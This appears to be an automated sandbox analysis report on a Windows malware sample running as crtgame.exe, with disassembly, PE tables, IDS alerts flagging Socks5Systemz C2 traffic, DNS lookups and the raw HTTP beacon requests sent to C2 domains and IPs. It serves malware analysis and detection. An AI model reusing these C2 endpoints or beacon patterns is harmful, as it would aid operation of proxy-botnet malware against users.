                                                                                                          push 0040A2C5h
                                                                                                          push dword ptr fs:[edx]
                                                                                                          mov dword ptr fs:[edx], esp
                                                                                                          mov eax, dword ptr [0040C014h]
                                                                                                          call 00007F5AE8DC907Bh
                                                                                                          call 00007F5AE8DC8CAEh
                                                                                                          lea edx, dword ptr [ebp-10h]
                                                                                                          xor eax, eax
                                                                                                          call 00007F5AE8DC6168h
                                                                                                          mov edx, dword ptr [ebp-10h]
                                                                                                          mov eax, 0040CDE8h
                                                                                                          call 00007F5AE8DC2717h
                                                                                                          push 00000002h
                                                                                                          push 00000000h
                                                                                                          push 00000001h
                                                                                                          mov ecx, dword ptr [0040CDE8h]
                                                                                                          mov dl, 01h
                                                                                                          mov eax, 0040738Ch
                                                                                                          call 00007F5AE8DC69F7h
                                                                                                          mov dword ptr [0040CDECh], eax
                                                                                                          xor edx, edx
                                                                                                          push ebp
                                                                                                          push 0040A27Dh
                                                                                                          push dword ptr fs:[edx]
                                                                                                          mov dword ptr fs:[edx], esp
                                                                                                          call 00007F5AE8DC90EBh
                                                                                                          mov dword ptr [0040CDF4h], eax
                                                                                                          mov eax, dword ptr [0040CDF4h]
                                                                                                          cmp dword ptr [eax+0Ch], 01h
                                                                                                          jne 00007F5AE8DC922Ah
                                                                                                          mov eax, dword ptr [0040CDF4h]
                                                                                                          mov edx, 00000028h
                                                                                                          call 00007F5AE8DC6DF8h
                                                                                                          mov edx, dword ptr [000000F4h]
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          CODE0x10000x93640x94000d7ac17dafcd52a9b3ea353c32256c1dFalse0.6148648648648649data6.56223225792919IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          DATA0xb0000x24c0x40045829356498700390b8c7afa10ea05a4False0.31640625data2.7585022150416294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          BSS0xc0000xe4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x110000x2c000x2c00f6c630e7cc236d28ebf716909ed9b50aFalse0.32262073863636365data4.461907293084106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                                          RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                                          RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                                          RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                                          RT_STRING0x125740x2f2data0.35543766578249336
                                                                                                          RT_STRING0x128680x30cdata0.3871794871794872
                                                                                                          RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                                          RT_STRING0x12e440x68data0.75
                                                                                                          RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                                          RT_STRING0x12f600xaedata0.5344827586206896
                                                                                                          RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                                          RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                                          RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27483443708609273
                                                                                                          RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                                                          DLLImport
                                                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                                          user32.dllMessageBoxA
                                                                                                          oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                                          kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                                          user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                                          comctl32.dllInitCommonControls
                                                                                                          advapi32.dllAdjustTokenPrivileges
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          DutchNetherlands
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-15T00:53:05.470412+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44973694.232.249.18780TCP
                                                                                                          2024-12-15T00:53:05.470412+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44973694.232.249.18780TCP
                                                                                                          2024-12-15T00:53:18.604536+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44976494.232.249.18780TCP
                                                                                                          2024-12-15T00:53:18.604536+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44976494.232.249.18780TCP
                                                                                                          2024-12-15T00:53:31.870192+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44979094.232.249.18780TCP
                                                                                                          2024-12-15T00:53:31.870192+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44979094.232.249.18780TCP
                                                                                                          2024-12-15T00:53:50.705539+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449847185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:50.705539+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449847185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:54.522921+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449847185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:54.522921+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449847185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:56.045459+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449860185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:56.045459+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449860185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:57.696443+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449866185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:57.696443+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449866185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:59.329963+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449872185.237.206.12980TCP
                                                                                                          2024-12-15T00:53:59.329963+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449872185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:00.858930+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449875185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:00.858930+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449875185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:02.418389+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449880185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:02.418389+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449880185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:04.014737+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449885185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:04.014737+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449885185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:05.707108+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449889185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:05.707108+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449889185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:07.245777+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449894185.237.206.12980TCP
                                                                                                          2024-12-15T00:54:07.245777+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449894185.237.206.12980TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 15, 2024 00:52:57.321162939 CET4973680192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:52:57.441134930 CET804973694.232.249.187192.168.2.4
                                                                                                          Dec 15, 2024 00:52:57.441384077 CET4973680192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:52:57.448066950 CET4973680192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:52:57.567864895 CET804973694.232.249.187192.168.2.4
                                                                                                          Dec 15, 2024 00:53:05.470412016 CET4973680192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:10.479865074 CET4976480192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:10.601378918 CET804976494.232.249.187192.168.2.4
                                                                                                          Dec 15, 2024 00:53:10.601466894 CET4976480192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:10.601617098 CET4976480192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:10.723824978 CET804976494.232.249.187192.168.2.4
                                                                                                          Dec 15, 2024 00:53:18.604536057 CET4976480192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:23.647463083 CET4979080192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:23.768018961 CET804979094.232.249.187192.168.2.4
                                                                                                          Dec 15, 2024 00:53:23.768807888 CET4979080192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:23.860173941 CET4979080192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:23.980261087 CET804979094.232.249.187192.168.2.4
                                                                                                          Dec 15, 2024 00:53:31.870192051 CET4979080192.168.2.494.232.249.187
                                                                                                          Dec 15, 2024 00:53:49.205490112 CET4984780192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:49.325556040 CET8049847185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:49.325758934 CET4984780192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:49.326066017 CET4984780192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:49.446201086 CET8049847185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:50.705348015 CET8049847185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:50.705538988 CET4984780192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:50.707357883 CET498512023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:50.827215910 CET20234985189.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:53:50.827402115 CET498512023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:50.827402115 CET498512023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:50.949246883 CET20234985189.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:53:50.949470997 CET498512023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:51.069905996 CET20234985189.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:53:52.073286057 CET20234985189.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:53:52.119965076 CET498512023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:54.089119911 CET4984780192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:54.208997011 CET8049847185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:54.522368908 CET8049847185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:54.522921085 CET4984780192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:54.636126995 CET4984780192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:54.636346102 CET4986080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:54.756181955 CET8049860185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:54.756376028 CET8049847185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:54.756534100 CET4986080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:54.756535053 CET4986080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:54.756561995 CET4984780192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:54.876568079 CET8049860185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:56.045377970 CET8049860185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:56.045459032 CET4986080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:56.045840979 CET498652023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:56.165807009 CET20234986589.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:53:56.165951967 CET498652023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:56.166026115 CET498652023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:56.166026115 CET498652023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:56.276501894 CET4986080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:56.276828051 CET4986680192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:56.285968065 CET20234986589.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:53:56.328742981 CET20234986589.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:53:56.396863937 CET8049860185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:56.396964073 CET8049866185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:56.397070885 CET4986080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:56.397176027 CET4986680192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:56.397176027 CET4986680192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:56.517019033 CET8049866185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:57.194428921 CET20234986589.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:53:57.196671963 CET498652023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:53:57.696259022 CET8049866185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:57.696443081 CET4986680192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:57.807899952 CET4986680192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:57.808021069 CET4987280192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:57.927970886 CET8049872185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:57.928073883 CET4987280192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:57.928143978 CET8049866185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:57.928294897 CET4987280192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:57.928375959 CET4986680192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:58.048063040 CET8049872185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:59.329875946 CET8049872185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:59.329962969 CET4987280192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:59.448292017 CET4987280192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:59.448561907 CET4987580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:59.568417072 CET8049875185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:59.568468094 CET8049872185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:53:59.568509102 CET4987280192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:59.568613052 CET4987580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:59.568718910 CET4987580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:53:59.688443899 CET8049875185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:00.858733892 CET8049875185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:00.858930111 CET4987580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:00.964185953 CET4987580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:00.964343071 CET4988080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:01.084192991 CET8049880185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:01.084336042 CET4988080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:01.084394932 CET8049875185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:01.084453106 CET4988080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:01.084804058 CET4987580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:01.204252958 CET8049880185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:02.418303967 CET8049880185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:02.418389082 CET4988080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:02.528295040 CET4988080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:02.528795004 CET4988580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:02.648679972 CET8049885185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:02.648720026 CET8049880185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:02.648804903 CET4988080192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:02.649027109 CET4988580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:02.649027109 CET4988580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:02.768918037 CET8049885185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:04.014514923 CET8049885185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:04.014559031 CET8049885185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:04.014736891 CET4988580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:04.014736891 CET4988580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:04.015182972 CET498882023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:54:04.135299921 CET20234988889.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:54:04.135449886 CET498882023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:54:04.135512114 CET498882023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:54:04.135858059 CET498882023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:54:04.247644901 CET4988580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:04.247946024 CET4988980192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:04.255394936 CET20234988889.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:54:04.255685091 CET20234988889.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:54:04.367778063 CET8049889185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:04.367933989 CET8049885185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:04.369046926 CET4988980192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:04.369048119 CET4988980192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:04.369081020 CET4988580192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:04.489118099 CET8049889185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:05.136492014 CET20234988889.105.201.183192.168.2.4
                                                                                                          Dec 15, 2024 00:54:05.136785030 CET498882023192.168.2.489.105.201.183
                                                                                                          Dec 15, 2024 00:54:05.705007076 CET8049889185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:05.707108021 CET4988980192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:05.825870037 CET4988980192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:05.826165915 CET4989480192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:05.945993900 CET8049894185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:05.946032047 CET8049889185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:05.946084976 CET4989480192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:05.946178913 CET4988980192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:05.946388960 CET4989480192.168.2.4185.237.206.129
                                                                                                          Dec 15, 2024 00:54:06.066200018 CET8049894185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:07.245379925 CET8049894185.237.206.129192.168.2.4
                                                                                                          Dec 15, 2024 00:54:07.245776892 CET4989480192.168.2.4185.237.206.129
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 15, 2024 00:52:56.830883980 CET5105753192.168.2.4141.98.234.31
                                                                                                          Dec 15, 2024 00:52:57.249429941 CET5351057141.98.234.31192.168.2.4
                                                                                                          Dec 15, 2024 00:53:36.886642933 CET6126253192.168.2.4194.49.94.194
                                                                                                          Dec 15, 2024 00:53:37.901808977 CET6126253192.168.2.4194.49.94.194
                                                                                                          Dec 15, 2024 00:53:38.917215109 CET6126253192.168.2.4194.49.94.194
                                                                                                          Dec 15, 2024 00:53:40.917218924 CET6126253192.168.2.4194.49.94.194
                                                                                                          Dec 15, 2024 00:53:44.917165995 CET6126253192.168.2.4194.49.94.194
                                                                                                          Dec 15, 2024 00:53:48.937347889 CET5358853192.168.2.4152.89.198.214
                                                                                                          Dec 15, 2024 00:53:49.203010082 CET5353588152.89.198.214192.168.2.4
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 15, 2024 00:52:56.830883980 CET192.168.2.4141.98.234.310x1141Standard query (0)bodotpd.comA (IP address)IN (0x0001)false
                                                                                                          Dec 15, 2024 00:53:36.886642933 CET192.168.2.4194.49.94.1940x2e93Standard query (0)gdpkvkr.comA (IP address)IN (0x0001)false
                                                                                                          Dec 15, 2024 00:53:37.901808977 CET192.168.2.4194.49.94.1940x2e93Standard query (0)gdpkvkr.comA (IP address)IN (0x0001)false
                                                                                                          Dec 15, 2024 00:53:38.917215109 CET192.168.2.4194.49.94.1940x2e93Standard query (0)gdpkvkr.comA (IP address)IN (0x0001)false
                                                                                                          Dec 15, 2024 00:53:40.917218924 CET192.168.2.4194.49.94.1940x2e93Standard query (0)gdpkvkr.comA (IP address)IN (0x0001)false
                                                                                                          Dec 15, 2024 00:53:44.917165995 CET192.168.2.4194.49.94.1940x2e93Standard query (0)gdpkvkr.comA (IP address)IN (0x0001)false
                                                                                                          Dec 15, 2024 00:53:48.937347889 CET192.168.2.4152.89.198.2140x6354Standard query (0)gdpkvkr.comA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 15, 2024 00:52:57.249429941 CET141.98.234.31192.168.2.40x1141No error (0)bodotpd.com94.232.249.187A (IP address)IN (0x0001)false
                                                                                                          Dec 15, 2024 00:53:49.203010082 CET152.89.198.214192.168.2.40x6354No error (0)gdpkvkr.com185.237.206.129A (IP address)IN (0x0001)false
                                                                                                          • bodotpd.com
                                                                                                          • gdpkvkr.com
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.44973694.232.249.187805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:52:57.448066950 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1
                                                                                                          Host: bodotpd.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.44976494.232.249.187805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:53:10.601617098 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1
                                                                                                          Host: bodotpd.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.44979094.232.249.187805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:53:23.860173941 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1
                                                                                                          Host: bodotpd.com
